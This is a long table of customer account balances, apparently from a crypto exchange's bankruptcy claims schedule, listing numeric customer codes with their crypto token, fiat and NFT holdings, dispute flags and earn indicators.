| 07335739 | | AUD[0.00], BAT[424.31064522], BF_POINT[300], BRZ[0], BTC[0.10312592], CUSDT[5], DOGE[14807.80561659], ETH[0], ETHW[0], EUR[0.00], GRT[0], LTC[0], SOL[0], SUSHI[2.41680729], TRX[4.48762004], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07335740 | | DOGE[50936.18377722], ETH[2.11630452], ETHW[2.11541562], NFT (292192245411171112/Space Bums #3049)[1], NFT (413876354764114886/Space Bums #0368)[1], NFT (569895616670735518/Space Bums #2653)[1], SHIB[2271726.74264166], USD[0.00], USDT[0] | Yes | |
| 07335741 | | BRZ[1], CUSDT[9], DOGE[1], USD[.00002762], TRX[3], USD[0.00] | | |
| 07335742 | | DOGE[14869.1796874], USD[0.00] | | |
| 07335743 | | USD[10.00] | | |
| 07335744 | | DOGE[.03696437], USD[0.00] | | |
| 07335745 | | USD[10.00] | | |
| 07335746 | | USD[10.00] | | |
| 07335747 | Contingent, Disputed | USD[0.00] | Yes | |
| 07335748 | | USD[10.00] | | |
| 07335749 | | USD[10.00] | | |
| 07335750 | | BTC[0], DOGE[6.92292314], USD[0.00] | | |
| 07335751 | | BTC[.00022599], CUSDT[1], DOGE[171.55298815], USD[17.09] | | |
| 07335752 | | USD[10.00] | | |
| 07335753 | | BTC[.00025617], DOGE[1], USD[0.00] | | |
| 07335754 | | USD[10.00] | | |
| 07335755 | | BRZ[1], CUSDT[1], DOGE[1399.98448363], TRX[1], USD[0.09], USDT[1] | | |
| 07335756 | | BTC[.00002156], CUSDT[1], DOGE[378.49949522], ETH[.00573425], ETHW[.00573425], LINK[.0390411], SOL[.11688654], SUSHI[.07176294], USD[0.00] | | |
| 07335757 | | USD[10.00] | | |
| 07335758 | | USD[10.00] | | |
| 07335759 | | USD[10.00] | | |
| 07335761 | | BRZ[0], USD[0.00], USDT[0] | Yes | |
| 07335762 | | CUSDT[2], DOGE[.00004207], TRX[1], USD[0.01] | | |
| 07335764 | | CUSDT[4], DOGE[36.43938293], USD[0.00] | | |
| 07335765 | | BTC[.00021263], DAI[0], DOGE[1], TRX[2], USD[0.00] | | |
| 07335766 | | CUSDT[1], DOGE[.00207915], USD[0.01] | Yes | |
| 07335767 | | BRZ[2], CUSDT[6], GRT[1], TRX[2], USD[0.01] | | |
| 07335768 | | USD[10.00] | | |
| 07335769 | | DOGE[173.32457771], USD[0.00] | | |
| 07335770 | | USD[10.00] | | |
| 07335771 | | USD[10.00] | | |
| 07335774 | | CUSDT[5], ETH[.00088926], ETHW[.00087561], USD[0.00] | Yes | |
| 07335775 | | ETH[0.00001591], ETHW[0.00001591], USD[0.00] | Yes | |
| 07335776 | | CUSDT[2], USD[0.00] | | |
| 07335778 | | CUSDT[1], ETH[0], ETHW[0], TRX[3], USD[10.00] | | |
| 07335780 | | USD[0.00] | | |
| 07335781 | | BTC[.00374186], CUSDT[3], USD[45.14] | | |
| 07335782 | | USD[0.00] | | |
| 07335783 | | USD[10.00] | | |
| 07335784 | | CUSDT[3], DOGE[.00003014], USD[0.00] | | |
| 07335785 | | USD[10.00] | | |
| 07335786 | | USD[10.00] | | |
| 07335787 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335788 | | CUSDT[1], DOGE[147.21836143], USD[0.37] | | |
| 07335789 | | USD[0.01], USDT[0] | | |
| 07335790 | | BRZ[1], CUSDT[2], SHIB[1], USD[0.00] | | |
| 07335791 | | BRZ[2], BTC[0], CUSDT[1], DOGE[851.76737756], ETH[0.21710657], ETHW[0.21710657], GRT[1], TRX[1], USD[0.00], USDT[2] | | |
| 07335792 | | USD[10.00] | | |
| 07335793 | | DOGE[29.80161985], USD[0.00] | | |
| 07335796 | | USD[10.00] | | |
| 07335797 | | USD[10.00] | | |
| 07335798 | | CUSDT[2], DOGE[1.00029538], USD[0.00] | | |
| 07335799 | | CUSDT[5], DOGE[76.80720342], USD[0.86] | Yes | |
| 07335800 | | DOGE[1.26294574], TRX[1], USD[0.32] | | |
| 07335801 | | USD[16.05] | | |
| 07335802 | | BRZ[3], CUSDT[12], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07335803 | | USD[10.00] | | |
| 07335804 | | DOGE[177.69573763], USD[0.00] | | |
| 07335805 | | BAT[0], CUSDT[2], DOGE[1], MATIC[0], NFT (293086087476499176/Warriors 75th Anniversary Icon Edition Diamond #853)[1], SHIB[6], TRX[5], USD[0.00], USDT[2.79334699] | Yes | |
| 07335806 | | USD[10.00] | | |
| 07335807 | | USD[10.00] | | |
| 07335808 | | BAT[1.01511763], BRZ[2], CUSDT[96.37394704], DOGE[2], GRT[1.00498957], KSHIB[3684.45079422], SHIB[20], SUSHI[299.44613038], TRX[7], USD[0.01], USDT[1.07634437] | Yes | |
| 07335809 | | CUSDT[2], DOGE[11.38995829], SHIB[413056.81707562], USD[0.00] | Yes | |
| 07335810 | | BRZ[0], BTC[0.001515010], CUSDT[5], DOGE[1057.70580353], ETH[.02128343], ETHW[.02128343], SHIB[2], USD[291.11] | | |
| 07335811 | | USD[10.00] | | |
| 07335812 | | BRZ[0], USD[0.00], USDT[0.00000197] | | |
| 07335813 | | BTC[.00025507], USD[0.00] | | |
| 07335814 | | MATIC[0], USD[0.00] | | |
| 07335815 | | USD[10.00] | | |
| 07335816 | | BAT[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07335817 | | USD[10.00] | | |
| 07335818 | | DOGE[151.12698049], USD[0.00] | Yes | |
| 07335819 | | SOL[1.13744672], USD[0.00] | | |
| 07335820 | | BRZ[1], USD[0.01] | | |
| 07335821 | | USD[0.00] | | |
| 07335822 | | USD[10.00] | | |
| 07335823 | | USD[10.00] | | |
| 07335824 | | USD[10.00] | | |
| 07335825 | | TRX[80.69269188], USD[0.00] | | |
| 07335826 | | USD[10.00] | | |
| 07335827 | | DOGE[1.00001032], GRT[7.61585122], USD[0.01] | | |
| 07335828 | | USD[10.00] | | |
| 07335829 | | USD[10.00] | | |
| 07335830 | | CUSDT[4], SHIB[128.81098367], USD[0.00] | | |
| 07335832 | | DOGE[562.76827473], USD[0.00] | Yes | |
| 07335833 | | CUSDT[1], TRX[7990.12867542], USD[0.00] | | |
| 07335834 | | USD[10.00] | | |
| 07335835 | | USD[10.00] | | |
| 07335836 | | DOGE[148.28162844], USD[0.00] | | |
| 07335837 | | DOGE[1.58777688], USD[187.99] | | |
| 07335838 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07335839 | | BRZ[1], DOGE[0], ETH[0], LINK[0], LTC[0], TRX[2], USD[0.00], USDT[0.00000189], YFI[0] | Yes | |
| 07335840 | | USD[10.00] | | |
| 07335841 | | USD[10.00] | | |
| 07335842 | | DOGE[0], USD[0.00] | | |
| 07335843 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07335844 | | BAT[4.41710001], BRZ[12.13435124], BTC[0], CUSDT[93.95932751], DOGE[0], ETH[0], GRT[2.07611552], SHIB[1], SOL[.03422564], TRX[6], USD[0.51] | Yes | |
| 07335845 | | USD[10.00] | | |
| 07335846 | | USD[10.00] | | |
| 07335847 | | KSHIB[364184.67720019], MKR[0], USD[2.88], USDT[1] | | |
| 07335849 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335851 | | USD[10.00] | | |
| 07335852 | | BTC[0], CUSDT[13], DOGE[87.90264300], ETH[0], ETHW[0], TRX[0], USD[0.01] | Yes | |
| 07335853 | | DOGE[0], USD[0.00] | | |
| 07335854 | | DOGE[175.25537775], USD[0.00] | | |
| 07335855 | | CUSDT[1], DOGE[2.00002308], TRX[1], USD[0.00] | | |
| 07335856 | | USD[10.00] | | |
| 07335858 | | USD[10.00] | | |
| 07335859 | | CUSDT[2], DOGE[243.08945302], USD[100.02], USDT[99.46061414] | | |
| 07335860 | | USD[10.00] | | |
| 07335861 | | GRT[15.39538659], USD[0.00] | Yes | |
| 07335862 | | DOGE[1], USD[0.01] | | |
| 07335863 | | BRZ[1], BTC[0], CUSDT[1], DAI[0], DOGE[0], ETH[0], TRX[0], USD[0.00] | | |
| 07335864 | | USD[10.00] | | |
| 07335865 | | USD[10.00] | | |
| 07335866 | | USD[10.00] | | |
| 07335867 | | USD[10.00] | | |
| 07335868 | | DOGE[1.75371234], TRX[2], USD[180.17] | | |
| 07335869 | | TRX[1], USD[0.01] | | |
| 07335870 | | SHIB[644100.23676719], TRX[1], USD[0.00] | | |
| 07335871 | | USD[10.00] | | |
| 07335873 | | USD[10.00] | | |
| 07335874 | | BRZ[2], BTC[0], CUSDT[0], DOGE[0], LINK[.00006108], SHIB[3], SOL[0], SUSHI[0], TRX[4], USD[0.00] | Yes | |
| 07335875 | | DOGE[123.94290644], USD[0.00] | | |
| 07335876 | | USD[10.00] | | |
| 07335877 | | BRZ[0], DOGE[0], USD[0.01] | | |
| 07335878 | | USD[11.06] | Yes | |
| 07335879 | | USD[10.00] | | |
| 07335880 | | USD[10.00] | | |
| 07335881 | | TRX[2], USD[0.01] | | |
| 07335882 | | DOGE[.00000253], USD[0.00] | | |
| 07335883 | | USD[0.01] | Yes | |
| 07335884 | | USD[10.00] | | |
| 07335885 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07335886 | | BAT[3.21080262], BRZ[1], CUSDT[37.5850334], NFT [475142845548220802/Alice #2][1], TRX[2], UNI[1.0463094], USD[0.01] | Yes | |
| 07335888 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07335889 | | USD[10.00] | | |
| 07335890 | | TRX[212.03965395], USD[0.00] | | |
| 07335891 | | USD[10.00] | | |
| 07335892 | | USD[10.00] | | |
| 07335893 | | USD[10.00] | | |
| 07335894 | | USD[0.01] | | |
| 07335895 | | USD[10.00] | | |
| 07335896 | | CUSDT[2], DOGE[293.26509635], USD[0.06] | | |
| 07335897 | | BRZ[1], USD[0.01], USDT[0] | | |
| 07335898 | | BTC[0], USD[0.00], USDT[0.00000001] | | |
| 07335899 | | USD[10.00] | | |
| 07335900 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07335901 | | USD[10.00] | | |
| 07335902 | | USD[10.00] | | |
| 07335903 | | BRZ[1], CUSDT[3], SOL[.55623087], TRX[4], USD[6.28] | Yes | |
| 07335904 | | USD[10.00] | | |
| 07335905 | | USD[10.00] | | |
| 07335906 | | TRX[271.62642023], USD[10.00] | | |
| 07335907 | | USD[10.00] | | |
| 07335908 | | CUSDT[520.14573857], DOGE[2], USD[0.00] | | |
| 07335909 | | ETH[.00000207], ETHW[.00000207], TRX[202.50298178], USD[0.00] | | |
| 07335910 | | CUSDT[5.37312319], DOGE[.04860342], TRX[292.57664272], UNI[.98767646], USD[-11.11] | | |
| 07335911 | | BRZ[1], CUSDT[9], TRX[3], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335912 | | BCH[.00090807], DOGE[1], USD[0.00] | | |
| 07335914 | | USD[10.00] | | |
| 07335915 | | USD[10.00] | | |
| 07335916 | | CUSDT[1], DOGE[186.01429222], USD[0.00] | | |
| 07335917 | | USD[10.00] | | |
| 07335918 | | USD[10.00] | | |
| 07335919 | | CUSDT[3], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07335920 | | USD[10.00] | | |
| 07335921 | | USD[10.00] | | |
| 07335922 | | USD[10.00] | | |
| 07335924 | | DOGE[1192.10556321], USD[0.00] | Yes | |
| 07335925 | | BCH[.00185969], BRZ[1], BTC[.00774497], CUSDT[9], DOGE[161.75407257], ETH[.35542927], ETHW[.35542927], TRX[2], USD[0.60] | | |
| 07335926 | | USD[0.01] | | |
| 07335927 | | GRT[9.91543266], USD[0.00] | | |
| 07335928 | | DOGE[5120.78654878], USD[10.00] | | |
| 07335929 | | BCH[1.00000806], BTC[.02076659], DOGE[3300.64365155], USD[519.93], USDT[1] | | |
| 07335930 | | CUSDT[1], TRX[1], USD[0.06] | | |
| 07335932 | | USD[10.00] | | |
| 07335933 | | BRZ[1], CUSDT[2], DOGE[.62369387], GRT[1], TRX[3], USD[0.00] | | |
| 07335934 | | BTC[0], GRT[0], MATIC[.05365178], TRX[0], USD[0.00] | Yes | |
| 07335935 | | BCH[.11256151], CUSDT[1], DOGE[121.27976495], TRX[3], UNI[2.32538524], USD[0.01] | | |
| 07335936 | | USD[10.00] | | |
| 07335937 | | LINK[115.35359719], MATIC[733.81177165], USD[0.00] | | |
| 07335938 | | USD[10.00] | | |
| 07335940 | | USD[10.00] | | |
| 07335941 | | BAT[1.01598014], CUSDT[17.92826566], DOGE[15.30336185], SHIB[149037.54451422], TRX[1], USD[0.00] | Yes | |
| 07335942 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07335943 | | USD[10.00] | | |
| 07335944 | | USD[10.00] | | |
| 07335945 | | USD[0.14] | Yes | |
| 07335946 | | USD[10.00] | | |
| 07335947 | | CUSDT[1], UNI[.22048552], USD[0.00] | | |
| 07335948 | | USD[10.00] | | |
| 07335949 | | BRZ[2], CUSDT[15], DOGE[4], ETH[0.00001037], ETHW[0.00001037], NFT (317007285468941996/Dream Land #3)[1], NFT (470032768281892060/Camel Polly)[1], NFT (544478919906501446/Chitto #12)[1], SOL[0], TRX[5], USD[0.00] | Yes | |
| 07335950 | | DOGE[16.33962952], USD[0.00] | | |
| 07335951 | | USD[10.00] | | |
| 07335952 | | BF_POINT[200], CUSDT[4], DOGE[0], ETH[0], TRX[.00162483], USD[0.37], USDT[1.10313344] | Yes | |
| 07335953 | | BAT[7.51796452], BRZ[6.30359285], CUSDT[1], ETH[.0000248], ETHW[.0000248], GRT[2.04894139], NFT (465711344171457837/Coachella x FTX Weekend 2 #4955)[1], TRX[5], USD[9.53], USDT[0.10732622] | Yes | |
| 07335954 | | SUSHI[0], TRX[0], USD[0.00] | | |
| 07335955 | | DOGE[1], USD[0.00] | | |
| 07335956 | | CUSDT[1], DOGE[5509.77213134], USD[0.00], USDT[1] | | |
| 07335957 | | USD[10.00] | | |
| 07335958 | | USD[10.00] | | |
| 07335959 | | DOGE[1.00817892], USD[0.01] | | |
| 07335961 | | BTC[0], DOGE[145.62439854], USD[0.00], USDT[0] | Yes | |
| 07335962 | | BAT[6.50179772], BRZ[5.04066659], CUSDT[1], DOGE[3715.37339294], GRT[1.00156283], KSHIB[11488.74355883], SUSHI[1.08311851], TRX[1], USD[0.42], USDT[3.2508988] | Yes | |
| 07335963 | | USD[10.00] | | |
| 07335964 | | USD[10.00] | | |
| 07335965 | | USD[0.01] | | |
| 07335966 | | DOGE[28.04019663], USD[0.00] | | |
| 07335967 | | CUSDT[3], DOGE[.41300694], ETH[.02133017], SHIB[11327015.02484139], TRX[3], USD[50.73] | | |
| 07335968 | | BRZ[3.17647754], CUSDT[8.01695463], DOGE[0], SOL[0], SUSHI[.80343864], UNI[.01251973], USD[0.01], USDT[0.00000021] | | |
| 07335969 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | | |
| 07335970 | | DOGE[105.61665557], SHIB[113362.11363509], USD[0.00] | Yes | |
| 07335971 | | USD[0.00] | | |
| 07335972 | | USD[0.06] | | |
| 07335973 | | CUSDT[3], DOGE[.00004646], USD[0.14] | | |
| 07335974 | | BRZ[1], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07335975 | | CUSDT[1.0000235], DOGE[.00004985], TRX[184.52224679], USD[0.09] | | |
| 07335976 | | AAVE[.00000012], DOGE[1], ETH[0], ETHW[0], GRT[5.42899207], MATIC[13.65363128], SHIB[313368.06938927], SUSHI[1.17077857], USD[0.92], USDT[0.00000001] | Yes | |
| 07335977 | | DOGE[.02658404], USD[0.00], USDT[0] | Yes | |
| 07335978 | | SOL[.654756669], USD[0.00] | | |
| 07335979 | | USD[0.01], USDT[0] | | |
| 07335980 | | CUSDT[1], DOGE[8367.21892379], USD[0.00] | Yes | |
| 07335981 | | USD[10.00] | | |
| 07335982 | | ETH[0], SOL[0] | | |
| 07335983 | | ETH[.0052059], ETHW[.0052059], USD[0.00] | | |
| 07335984 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], MATIC[0], SHIB[3], SUSHI[0], TRX[1], UNI[0], USD[0.01] | Yes | |
| 07335985 | | DOGE[186.41371357], USD[0.00] | Yes | |
| 07335986 | | USD[10.00] | | |
| 07335987 | | BRZ[1], CUSDT[1], DOGE[10094.78879046], ETH[.05754591], ETHW[.05754591], SUSHI[4.58396477], USD[75.00] | | |
| 07335988 | | USD[10.00] | | |
| 07335989 | | DOGE[2], USD[0.00] | Yes | |
| 07335990 | | CUSDT[1], USD[47.37] | | |
| 07335991 | | USD[0.00] | | |
| 07335993 | | CUSDT[1], DOGE[1], USD[2.26] | Yes | |
| 07335994 | | BTC[0], CUSDT[2], DOGE[0], USD[0.01] | | |
| 07335995 | | DOGE[154.7274337], USD[0.00] | | |
| 07335996 | | USD[10.00] | | |
| 07335997 | | DOGE[1], USD[57.74] | | |
| 07335998 | | USD[10.00] | | |
| 07335999 | | BAT[1], BRZ[3], CUSDT[8], DOGE[1248.08004066], TRX[3], USD[0.00], USDT[1] | | |
| 07336000 | | USD[10.00] | | |
| 07336001 | | BRZ[1], CUSDT[3], TRX[5], USD[0.00] | | |
| 07336003 | | ETH[.00383457], ETHW[.00383457], USD[0.00] | | |
| 07336004 | | DOGE[72.19230412], SHIB[1], USD[0.00] | | |
| 07336005 | | DOGE[29.21440934], USD[0.00] | | |
| 07336006 | | USD[10.00] | | |
| 07336007 | | BAT[0], BTC[0], DOGE[4.41717819], ETH[0.00714142], ETHW[0.00714142], SOL[0], TRX[1152.18414826], USD[0.00] | | |
| 07336008 | | USD[10.00] | | |
| 07336009 | | USD[10.00] | | |
| 07336010 | | CUSDT[1], DOGE[98.26012206], USD[0.00] | | |
| 07336011 | | CUSDT[1], USD[0.00] | | |
| 07336012 | | DOGE[108.79562238], USD[10.00] | | |
| 07336013 | | BCH[.04810901], BTC[.00389607], CUSDT[247.00209415], DOGE[225.10522088], ETH[.01869452], ETHW[.01869452], KSHIB[136.00246327], SHIB[228263.04580558], SOL[2.55476914], SUSHI[30.42595917], TRX[212.05631151], UNI[1.11954942], USD[0.00], YFI[.00075079] | | |
| 07336014 | | USD[10.00] | | |
| 07336015 | | ETH[.00000001], SHIB[25372070.23993387], SOL[39.52796471], USD[0.40], USDT[0] | Yes | |
| 07336016 | | TRX[1], USD[0.00] | | |
| 07336017 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07336018 | | ETHW[0.00002640], SHIB[218.32101589], SOL[.00003929], UNI[.00000435], USD[0.00], USDT[0.00000931] | Yes | |
| 07336019 | | BRZ[2], BTC[.00378728], DOGE[6], TRX[1], USD[6.10] | | |
| 07336020 | | CUSDT[11], DOGE[2], SOL[0.13677715], TRX[3], USD[0.00] | Yes | |
| 07336022 | | USD[10.00] | | |
| 07336023 | | USD[10.00] | | |
| 07336024 | | DOGE[2986.98808251], TRX[1], USD[10.00] | | |
| 07336025 | | BRZ[1], DOGE[214.8575702], USD[0.00] | | |
| 07336026 | | BTC[.00174001], CUSDT[4], DOGE[2], TRX[1], USD[11.22] | | |
| 07336027 | | USD[0.00] | | |
| 07336028 | | USD[0.00] | | |
| 07336029 | | BTC[.00466967], CUSDT[1], DOGE[1912.79821884], SOL[13.76512065], USD[0.00] | | |
| 07336030 | | USD[10.00] | | |
| 07336031 | | USD[10.00] | | |
| 07336032 | | SUSHI[.45775387], TRX[11856.8983035], USD[0.00] | Yes | |
| 07336033 | | USD[0.01] | | |
| 07336034 | | BAT[2], CUSDT[6], DOGE[3662.04392072], GRT[1], SUSHI[3.6193783], TRX[1], USD[1063.75] | | |
| 07336035 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336036 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07336037 | | DOGE[1.00057353], USD[0.00] | Yes | |
| 07336038 | | DOGE[1], USD[0.00] | | |
| 07336040 | | DOGE[1], USD[0.01] | | |
| 07336041 | | DOGE[1.6064453], USD[0.00] | | |
| 07336042 | Contingent, Disputed | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], USD[0.00] | | |
| 07336043 | | CUSDT[4], USD[0.00] | Yes | |
| 07336044 | | BTC[0.00870730], DOGE[0], ETH[0], USD[0.00] | | |
| 07336045 | | USD[0.02], USDT[0] | | |
| 07336046 | | CUSDT[1], USD[0.01] | Yes | |
| 07336047 | | BRZ[1], USD[10.06] | | |
| 07336048 | | DOGE[1], USD[0.00] | | |
| 07336049 | | USD[10.00] | | |
| 07336050 | | DOGE[3452.27207572], NFT (435103686575648507/Entrance Voucher #2399)[1], TRX[1], USD[0.00] | | |
| 07336051 | | DOGE[1.7389128], TRX[4], USD[0.00] | | |
| 07336053 | | TRX[1], USD[10.00] | | |
| 07336054 | | SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07336055 | | CUSDT[3], DOGE[2550.44454283], USD[0.01] | Yes | |
| 07336056 | | DOGE[1.07503505], TRX[1], USD[32.65] | | |
| 07336057 | | USD[10.00] | | |
| 07336058 | | USD[10.00] | | |
| 07336060 | | USD[10.00] | | |
| 07336061 | | DOGE[0], USD[0.00] | | |
| 07336062 | | CUSDT[17], TRX[4], USD[0.00] | Yes | |
| 07336063 | | USD[10.00] | | |
| 07336064 | | BTC[0], ETH[.00000001], ETHW[0], SHIB[7255464.8774507], SOL[91.61616139], USD[0.00], USDT[0] | Yes | |
| 07336065 | | USD[10.00] | | |
| 07336067 | | BRZ[1], CUSDT[3], DOGE[7201.24825925], USD[0.00] | | |
| 07336068 | | USD[10.00] | | |
| 07336069 | | TRX[1], USD[0.00] | | |
| 07336070 | | USD[10.00] | | |
| 07336071 | | USD[10.00] | | |
| 07336072 | | USD[10.00] | | |
| 07336073 | | DOGE[132.21280527], USD[0.00] | Yes | |
| 07336074 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07336075 | | USD[10.00] | | |
| 07336076 | | GRT[9.08432064], USD[0.00] | | |
| 07336077 | | USD[10.00] | | |
| 07336078 | | CUSDT[1], DOGE[465.87151896], KSHIB[1398.58575008], TRX[9557.59554373], USD[13.24], USDT[544.15698786] | Yes | |
| 07336079 | | USD[10.00] | | |
| 07336080 | | BCH[.00000047], DOGE[100], USD[0.01] | | |
| 07336081 | | USD[10.00] | | |
| 07336082 | | USD[10.00] | | |
| 07336083 | | DOGE[602.90639436], USD[0.01] | Yes | |
| 07336084 | | CUSDT[15], DOGE[381.5726584], LINK[2.34390214], SOL[.00413424], TRX[3], USD[0.00], USDT[3.7778713] | Yes | |
| 07336085 | | DOGE[13739.722], ETH[.00515685], ETHW[0.00515684], SHIB[8915381.99375848], USD[0.21] | | |
| 07336086 | | CUSDT[3], USD[0.00] | | |
| 07336087 | | BTC[.00154646], CUSDT[5], ETH[.02548779], ETHW[.02517292], TRX[1], USD[0.00] | Yes | |
| 07336088 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07336089 | | USD[10.00] | | |
| 07336090 | | USD[10.00] | | |
| 07336091 | | USD[10.00] | | |
| 07336092 | | USD[10.00] | | |
| 07336093 | | DOGE[1], USD[10.00] | | |
| 07336094 | | USD[10.00] | | |
| 07336095 | | USD[10.00] | | |
| 07336096 | | USD[0.12] | | |
| 07336097 | | BRZ[2], CUSDT[3], DOGE[3], ETH[0], TRX[5], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336098 | | USD[10.00] | | |
| 07336099 | | BTC[0], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07336100 | | USD[10.00] | | |
| 07336101 | | BRZ[2], CUSDT[11], SHIB[5], USD[0.00], USDT[1.10449435] | Yes | |
| 07336102 | | USD[10.00] | | |
| 07336103 | | USD[0.00] | | |
| 07336104 | | USD[10.00] | | |
| 07336105 | | DOGE[.02077374], USD[0.00] | | |
| 07336106 | | CUSDT[4], ETH[0], TRX[1], USD[0.00] | | |
| 07336107 | | CUSDT[1], DOGE[140.10468322], USD[0.00] | | |
| 07336108 | | USD[10.00] | | |
| 07336110 | | CUSDT[1], DOGE[1], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07336111 | | USD[60.00] | | |
| 07336112 | | AAVE[.00000001], BTC[.12812319], ETH[2.16274147], ETHW[1.89193057], LTC[1.44695692], NFT (370976039646254047/CryptoAvatar #136)[1], SOL[7.43190522], USD[155.37] | Yes | |
| 07336113 | | USD[10.00] | | |
| 07336114 | | TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07336115 | | USD[10.00] | | |
| 07336116 | | USD[10.00] | | |
| 07336117 | | BTC[0], DOGE[0], ETH[0], NFT (491916835443622290/Entrance Voucher #2779)[1], TRX[1], USD[0.00] | | |
| 07336118 | | USD[10.00] | | |
| 07336121 | | USD[10.00] | | |
| 07336122 | | DOGE[47.74130628], TRX[1], USD[0.00] | | |
| 07336123 | | DOGE[363.22376115], TRX[1], USD[0.00] | Yes | |
| 07336124 | | USD[10.00] | | |
| 07336125 | | USD[10.00] | | |
| 07336126 | | USD[10.00] | | |
| 07336128 | | USD[10.00] | | |
| 07336129 | | DOGE[0], USD[0.00] | | |
| 07336130 | | DOGE[1005.87675838], SHIB[1], USD[104.07] | | |
| 07336131 | | DOGE[22.08095963], USD[0.00] | | |
| 07336132 | | BTC[.003761], CUSDT[4], DOGE[855.78271366], ETH[.03986748], ETHW[.03986748], TRX[1], USD[0.00] | | |
| 07336134 | | USD[10.00] | | |
| 07336135 | | USD[10.00] | | |
| 07336136 | | USD[0.99] | | |
| 07336138 | | USD[10.00] | | |
| 07336139 | | DOGE[126.84732516], USD[0.00] | | |
| 07336140 | | USD[10.00] | | |
| 07336141 | | USD[0.11] | | |
| 07336143 | | BRZ[1], CUSDT[3], DOGE[1], USD[0.00] | | |
| 07336144 | | USD[20.00] | | |
| 07336145 | | DOGE[25.46018974], USD[0.00] | | |
| 07336146 | | DOGE[.952], USD[51.98] | | |
| 07336147 | | DOGE[1.00003759], USD[0.00] | | |
| 07336148 | | USD[0.00] | Yes | |
| 07336149 | | BCH[.00000924], BTC[.0000001], ETH[.00000148], LTC[.00001631], NFT (446363171410693500/Egg #0020 - Big Cat Hybrid)[1], SHIB[8], USD[2000.00], USDT[0.00000001] | Yes | |
| 07336150 | | USD[10.00] | | |
| 07336151 | | BTC[0], USD[2.14] | | |
| 07336152 | | BAT[1.72184237], BRZ[7.55180162], CUSDT[42], ETHW[.12479483], SHIB[10], TRX[17.46515178], USD[0.00] | Yes | |
| 07336153 | | DOGE[32.47751998], SHIB[454562.12934910], USD[0.00] | Yes | |
| 07336154 | | USD[10.00] | | |
| 07336155 | | USD[10.00] | | |
| 07336156 | | BRZ[1], BTC[0], CUSDT[34], ETH[0], ETHW[0.10253114], MATIC[167.99583694], SHIB[3], SOL[0], TRX[3], USD[64.28], USDT[0] | Yes | |
| 07336157 | | USD[10.00] | | |
| 07336159 | | USD[10.00] | | |
| 07336160 | | USD[30.00] | | |
| 07336161 | | USD[10.00] | | |
| 07336163 | | USD[10.00] | | |
| 07336164 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07336165 | | DOGE[1], USD[0.01] | | |
| 07336166 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07336167 | | USD[10.00] | | |
| 07336168 | | USD[10.00] | | |
| 07336171 | | DOGE[1], ETH[0], ETHW[0.00537451], USD[0.46] | Yes | |
| 07336172 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07336173 | | USD[10.00] | | |
| 07336174 | | BCH[.11980235], CUSDT[1], DOGE[40.26604581], USD[59.00] | | |
| 07336175 | | USD[10.00] | | |
| 07336176 | | USD[0.00] | | |
| 07336177 | | USD[10.00] | | |
| 07336178 | | USD[7.47] | Yes | |
| 07336179 | | USD[10.00] | | |
| 07336180 | | USD[10.00] | | |
| 07336181 | | AVAX[.13596343], BTC[.01154189], DOGE[7.02555328], ETH[.10003324], ETHW[.09900146], LINK[1.06010605], MATIC[10.98503315], SHIB[2120671.5071453], SOL[2.2352417], TRX[3], USD[7.43] | Yes | |
| 07336182 | | BTC[.00022011], USD[0.00] | | |
| 07336183 | | USD[0.00] | | |
| 07336184 | | USD[110.00] | | |
| 07336185 | | CUSDT[2], DOGE[2], USD[0.00] | | |
| 07336186 | | BTC[.00499508], CUSDT[3], DOGE[389.33369515], ETH[.06183938], ETHW[.0610733], USD[0.00] | Yes | |
| 07336187 | | DOGE[16075.71520739], SHIB[10863557.44400975], USD[0.00] | | |
| 07336189 | | USD[10.00] | | |
| 07336190 | | USD[10.00] | | |
| 07336191 | | USD[10.00] | | |
